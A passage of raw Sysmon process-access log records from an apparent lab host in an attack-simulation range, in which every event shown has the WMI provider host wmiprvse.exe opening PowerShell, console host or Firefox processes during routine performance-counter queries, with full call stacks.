21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150805Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150804Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150803Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150802Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150801Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150800Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150799Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150798Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150797Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150796Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150795Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150794Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150793Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150792Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150791Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150790Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla 